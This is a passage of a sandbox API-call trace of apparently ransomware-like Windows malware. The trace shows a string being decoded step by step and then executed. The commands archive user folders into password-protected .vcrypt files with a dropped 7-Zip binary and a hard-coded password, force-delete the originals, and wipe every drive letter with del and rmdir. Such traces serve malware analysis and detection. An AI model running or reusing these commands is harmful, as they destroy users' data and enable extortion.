/b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Deskwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktos_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\"#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" )#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" &#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & dho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & deo#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & del#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & del 2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & del /i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & del /f#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & del /f 2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & del /f /v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & del /f /s#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & del /f /s 2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & del /f /s /t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & del /f /s /q#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & del /f /s /q %(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.492] system (_Command="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & del /f /s /q \"%USERPROFILE%\\Desktop\\\" & FOR /D %p IN (\"%USERPROFILE%\\Desktop\\*\") do rmdir \"%p\" /s /q") returned 1073807364 [0072.802] system (_Command="if exist \"%USERPROFILE%\\Downloads\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Downloads\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_downloads.vcrypt\" \"%USERPROFILE%\\Downloads\\*\" & del /f /s /q \"%USERPROFILE%\\Downloads\\\" & FOR /D %p IN (\"%USERPROFILE%\\Downloads\\*\") do rmdir \"%p\" /s /q") returned -1073741502 [0073.071] system (_Command="if exist \"%USERPROFILE%\\Pictures\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Pictures\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_pictures.vcrypt\" \"%USERPROFILE%\\Pictures\\*\" & del /f /s /q \"%USERPROFILE%\\Pictures\\\" & FOR /D %p IN (\"%USERPROFILE%\\Pictures\\*\") do rmdir \"%p\" /s /q") returned -1073741502 [0073.676] system (_Command="if exist \"%USERPROFILE%\\Music\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Music\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_music.vcrypt\" \"%USERPROFILE%\\Music\\*\" & del /f /s /q \"%USERPROFILE%\\Music\\\" & FOR /D %p IN (\"%USERPROFILE%\\Music\\*\") do rmdir \"%p\" /s /q") returned -1073741502 [0074.202] system (_Command="if exist \"%USERPROFILE%\\Videos\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Videos\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_videos.vcrypt\" \"%USERPROFILE%\\Videos\\*\" & del /f /s /q \"%USERPROFILE%\\Videos\\\" & FOR /D %p IN (\"%USERPROFILE%\\Videos\\*\") do rmdir \"%p\" /s /q") returned -1073741502 [0074.497] system (_Command="if exist \"%USERPROFILE%\\Documents\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Documents\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_documents.vcrypt\" \"%USERPROFILE%\\Documents\\*\" & del /f /s /q \"%USERPROFILE%\\Documents\\\" & FOR /D %p IN (\"%USERPROFILE%\\Documents\\*\") do rmdir \"%p\" /s /q") Thread: id = 23 os_tid = 0x340 [0056.505] GetDriveTypeA (lpRootPathName="A:\\") returned 0x1 [0056.505] system (_Command="if exist \"A:\" del /f /s /q \"A:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q") returned 0 [0056.787] GetDriveTypeA (lpRootPathName="B:\\") returned 0x1 [0056.788] system (_Command="if exist \"B:\" del /f /s /q \"B:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q") returned 0 [0057.080] GetDriveTypeA (lpRootPathName="D:\\") returned 0x1 [0057.081] system (_Command="if exist \"D:\" del /f /s /q \"D:\" & FOR /D %p IN (\"D:\") DO rmdir \"%p\" /s /q") returned 0 [0057.625] GetDriveTypeA (lpRootPathName="E:\\") returned 0x1 [0057.625] system (_Command="if exist \"E:\" del /f /s /q \"E:\" & FOR /D %p IN (\"E:\") DO rmdir \"%p\" /s /q") returned 0 [0058.025] GetDriveTypeA (lpRootPathName="G:\\") returned 0x1 [0058.025] system (_Command="if exist \"G:\" del /f /s /q \"G:\" & FOR /D %p IN (\"G:\") DO rmdir \"%p\" /s /q") returned 0 [0058.468] GetDriveTypeA (lpRootPathName="H:\\") returned 0x1 [0058.468] system (_Command="if exist \"H:\" del /f /s /q \"H:\" & FOR /D %p IN (\"H:\") DO rmdir \"%p\" /s /q") returned 0 [0058.873] GetDriveTypeA (lpRootPathName="I:\\") returned 0x1 [0058.873] system (_Command="if exist \"I:\" del /f /s /q \"I:\" & FOR /D %p IN (\"I:\") DO rmdir \"%p\" /s /q") returned 0 [0059.234] GetDriveTypeA (lpRootPathName="J:\\") returned 0x1 [0059.235] system (_Command="if exist \"J:\" del /f /s /q \"J:\" & FOR /D %p IN (\"J:\") DO rmdir \"%p\" /s /q") returned 0 [0062.891] GetDriveTypeA (lpRootPathName="K:\\") returned 0x1 [0062.892] system (_Command="if exist \"K:\" del /f /s /q \"K:\" & FOR /D %p IN (\"K:\") DO rmdir \"%p\" /s /q") returned 0 [0063.530] GetDriveTypeA (lpRootPathName="L:\\") returned 0x1 [0063.530] system (_Command="if exist \"L:\" del /f /s /q \"L:\" & FOR /D %p IN (\"L:\") DO rmdir \"%p\" /s /q") returned 0 [0064.077] GetDriveTypeA (lpRootPathName="M:\\") returned 0x1 [0064.078] system (_Command="if exist \"M:\" del /f /s /q \"M:\" & FOR /D %p IN (\"M:\") DO rmdir \"%p\" /s /q") returned 0 [0064.442] GetDriveTypeA (lpRootPathName="N:\\") returned 0x1 [0064.442] system (_Command="if exist \"N:\" del /f /s /q \"N:\" & FOR /D %p IN (\"N:\") DO rmdir \"%p\" /s /q") returned 0 [0064.592] GetDriveTypeA (lpRootPathName="O:\\") returned 0x1 [0064.592] system (_Command="if exist \"O:\" del /f /s /q \"O:\" & FOR /D %p IN (\"O:\") DO rmdir \"%p\" /s /q") returned 0 [0064.736] GetDriveTypeA (lpRootPathName="P:\\") returned 0x1 [0064.736] system (_Command="if exist \"P:\" del /f /s /q \"P:\" & FOR /D %p IN (\"P:\") DO rmdir \"%p\" /s /q") returned 0 [0064.887] GetDriveTypeA (lpRootPathName="Q:\\") returned 0x1 [0064.887] system (_Command="if exist \"Q:\" del /f /s /q \"Q:\" & FOR /D %p IN (\"Q:\") DO rmdir \"%p\" /s /q") returned 0 [0065.027] GetDriveTypeA (lpRootPathName="R:\\") returned 0x1 [0065.027] system (_Command="if exist \"R:\" del /f /s /q \"R:\" & FOR /D %p IN (\"R:\") DO rmdir \"%p\" /s /q") returned 0 [0065.207] GetDriveTypeA (lpRootPathName="S:\\") returned 0x1 [0065.207] system (_Command="if exist \"S:\" del /f /s /q \"S:\" & FOR /D %p IN (\"S:\") DO rmdir \"%p\" /s /q") returned 0 [0065.360] GetDriveTypeA (lpRootPathName="T:\\") returned 0x1 [0065.360] system (_Command="if exist \"T:\" del /f /s /q \"T:\" & FOR /D %p IN (\"T:\") DO rmdir \"%p\" /s /q") returned 0 [0065.482] GetDriveTypeA (lpRootPathName="U:\\") returned 0x1 [0065.482] system (_Command="if exist \"U:\" del /f /s /q \"U:\" & FOR /D %p IN (\"U:\") DO rmdir \"%p\" /s /q") returned 0 [0065.748] GetDriveTypeA (lpRootPathName="V:\\") returned 0x1 [0065.748] system (_Command="if exist \"V:\" del /f /s /q \"V:\" & FOR /D %p IN (\"V:\") DO rmdir \"%p\" /s /q") returned 0 [0065.882] GetDriveTypeA (lpRootPathName="W:\\") returned 0x1 [0065.882] system (_Command="if exist \"W:\" del /f /s /q \"W:\" & FOR /D %p IN (\"W:\") DO rmdir \"%p\" /s /q") returned 0 [0066.018] GetDriveTypeA (lpRootPathName="X:\\") returned 0x1 [0066.018] system (_Command="if exist \"X:\" del /f /s /q \"X:\" & FOR /D %p IN (\"X:\") DO rmdir \"%p\" /s /q") returned 0 [0066.221] GetDriveTypeA (lpRootPathName="Y:\\") returned 0x1 [0066.221] system (_Command="if exist \"Y:\" del /f /s /q \"Y:\" & FOR /D %p IN (\"Y:\") DO rmdir \"%p\" /s /q") returned 0 [0066.361] GetDriveTypeA (lpRootPathName="Z:\\") returned 0x1 [0066.362] system (_Command="if exist \"Z:\" del /f /s /q \"Z:\" & FOR /D %p IN (\"Z:\") DO rmdir \"%p\" /s /q") returned 0 [0066.519] GetDriveTypeA (lpRootPathName="A:\\") returned 0x1 [0066.519] system (_Command="if exist \"A:\" del /f /s /q \"A:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q") returned 0 [0066.656] GetDriveTypeA (lpRootPathName="B:\\") returned 0x1 [0066.656] system (_Command="if exist \"B:\" del /f /s /q \"B:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q") returned 0 [0066.792] GetDriveTypeA (lpRootPathName="D:\\") returned 0x1 [0066.792] system (_Command="if exist \"D:\" del /f /s /q \"D:\" & FOR /D %p IN (\"D:\") DO rmdir \"%p\" /s /q") returned 0 [0066.939] GetDriveTypeA (lpRootPathName="E:\\") returned 0x1 [0066.939] system (_Command="if exist \"E:\" del /f /s /q \"E:\" & FOR /D %p IN (\"E:\") DO rmdir \"%p\" /s /q") returned 0 [0067.073] GetDriveTypeA (lpRootPathName="G:\\") returned 0x1 [0067.073] system (_Command="if exist \"G:\" del /f /s /q \"G:\" & FOR /D %p IN (\"G:\") DO rmdir \"%p\" /s /q") returned 0 [0067.207] GetDriveTypeA (lpRootPathName="H:\\") returned 0x1 [0067.208] system (_Command="if exist \"H:\" del /f /s /q \"H:\" & FOR /D %p IN (\"H:\") DO rmdir \"%p\" /s /q") returned 0 [0067.325] GetDriveTypeA (lpRootPathName="I:\\") returned 0x1 [0067.325] system (_Command="if exist \"I:\" del /f /s /q \"I:\" & FOR /D %p IN (\"I:\") DO rmdir \"%p\" /s /q") returned 0 [0067.461] GetDriveTypeA (lpRootPathName="J:\\") returned 0x1 [0067.462] system (_Command="if exist \"J:\" del /f /s /q \"J:\" & FOR /D %p IN (\"J:\") DO rmdir \"%p\" /s /q") returned 0 [0067.582] GetDriveTypeA (lpRootPathName="K:\\") returned 0x1 [0067.582] system (_Command="if exist \"K:\" del /f /s /q \"K:\" & FOR /D %p IN (\"K:\") DO rmdir \"%p\" /s /q") returned 0 [0067.773] GetDriveTypeA (lpRootPathName="L:\\") returned 0x1 [0067.773] system (_Command="if exist \"L:\" del /f /s /q \"L:\" & FOR /D %p IN (\"L:\") DO rmdir \"%p\" /s /q") returned 0 [0067.934] GetDriveTypeA (lpRootPathName="M:\\") returned 0x1 [0067.934] system (_Command="if exist \"M:\" del /f /s /q \"M:\" & FOR /D %p IN (\"M:\") DO rmdir \"%p\" /s /q") returned 0 [0068.061] GetDriveTypeA (lpRootPathName="N:\\") returned 0x1 [0068.062] system (_Command="if exist \"N:\" del /f /s /q \"N:\" & FOR /D %p IN (\"N:\") DO rmdir \"%p\" /s /q") returned 0 [0068.233] GetDriveTypeA (lpRootPathName="O:\\") returned 0x1 [0068.233] system (_Command="if exist \"O:\" del /f /s /q \"O:\" & FOR /D %p IN (\"O:\") DO rmdir \"%p\" /s /q") returned 0 [0068.383] GetDriveTypeA (lpRootPathName="P:\\") returned 0x1 [0068.383] system (_Command="if exist \"P:\" del /f /s /q \"P:\" & FOR /D %p IN (\"P:\") DO rmdir \"%p\" /s /q") returned 0 [0068.527] GetDriveTypeA (lpRootPathName="Q:\\") returned 0x1 [0068.528] system (_Command="if exist \"Q:\" del /f /s /q \"Q:\" & FOR /D %p IN (\"Q:\") DO rmdir \"%p\" /s /q") returned 0 [0068.667] GetDriveTypeA (lpRootPathName="R:\\") returned 0x1 [0068.667] system (_Command="if exist \"R:\" del /f /s /q \"R:\" & FOR /D %p IN (\"R:\") DO rmdir \"%p\" /s /q") returned 0 [0068.775] GetDriveTypeA (lpRootPathName="S:\\") returned 0x1 [0068.775] system (_Command="if exist \"S:\" del /f /s /q \"S:\" & FOR /D %p IN (\"S:\") DO rmdir \"%p\" /s /q") returned 0 [0068.897] GetDriveTypeA (lpRootPathName="T:\\") returned 0x1 [0068.897] system (_Command="if exist \"T:\" del /f /s /q \"T:\" & FOR /D %p IN (\"T:\") DO rmdir \"%p\" /s /q") returned 0 [0069.039] GetDriveTypeA (lpRootPathName="U:\\") returned 0x1 [0069.039] system (_Command="if exist \"U:\" del /f /s /q \"U:\" & FOR /D %p IN (\"U:\") DO rmdir \"%p\" /s /q") returned 0 [0070.049] GetDriveTypeA (lpRootPathName="V:\\") returned 0x1 [0070.049] system (_Command="if exist \"V:\" del /f /s /q \"V:\" & FOR /D %p IN (\"V:\") DO rmdir \"%p\" /s /q") returned 0 [0071.511] GetDriveTypeA (lpRootPathName="W:\\") returned 0x1 [0071.511] system (_Command="if exist \"W:\" del /f /s /q \"W:\" & FOR /D %p IN (\"W:\") DO rmdir \"%p\" /s /q") returned 1073807364 [0072.727] GetDriveTypeA (lpRootPathName="X:\\") returned 0x1 [0072.728] system (_Command="if exist \"X:\" del /f /s /q \"X:\" & FOR /D %p IN (\"X:\") DO rmdir \"%p\" /s /q") returned -1073741502 [0073.085] GetDriveTypeA (lpRootPathName="Y:\\") returned 0x1 [0073.085] system (_Command="if exist \"Y:\" del /f /s /q \"Y:\" & FOR /D %p IN (\"Y:\") DO rmdir \"%p\" /s /q") returned -1073741502 [0073.970] GetDriveTypeA (lpRootPathName="Z:\\") returned 0x1 [0073.970] system (_Command="if exist \"Z:\" del /f /s /q \"Z:\" & FOR /D %p IN (\"Z:\") DO rmdir \"%p\" /s /q") returned -1073741502 [0074.435] GetDriveTypeA (lpRootPathName="A:\\") returned 0x1 [0074.435] system (_Command="if exist \"A:\" del /f /s /q \"A:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q") Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4b48b000" os_pid = "0xa9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe\" C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 2 os_tid = 0xaa0 [0038.328] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32fb9c | out: lpSystemTimeAsFileTime=0x32fb9c*(dwLowDateTime=0xfdc23460, dwHighDateTime=0x1d623ff)) [0038.328] GetCurrentProcessId () returned 0xa9c [0038.328] GetCurrentThreadId () returned 0xaa0 [0038.328] GetTickCount () returned 0x1144e7e [0038.328] QueryPerformanceCounter (in: lpPerformanceCount=0x32fb94 | out: lpPerformanceCount=0x32fb94*=15846151438) returned 1 [0038.329] GetModuleHandleA (lpModuleName=0x0) returned 0x4a220000 [0038.330] __set_app_type (_Type=0x1) [0038.330] __p__fmode () returned 0x770331f4 [0038.332] __p__commode () returned 0x770331fc [0038.332] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a2421a6) returned 0x0 [0038.332] __getmainargs (in: _Argc=0x4a244238, _Argv=0x4a244240, _Env=0x4a24423c, _DoWildCard=0, _StartInfo=0x4a244140 | out: _Argc=0x4a244238, _Argv=0x4a244240, _Env=0x4a24423c) returned 0 [0038.333] GetCurrentThreadId () returned 0xaa0 [0038.333] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xaa0) returned 0x60 [0038.333] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0038.333] GetProcAddress (hModule=0x76d30000, 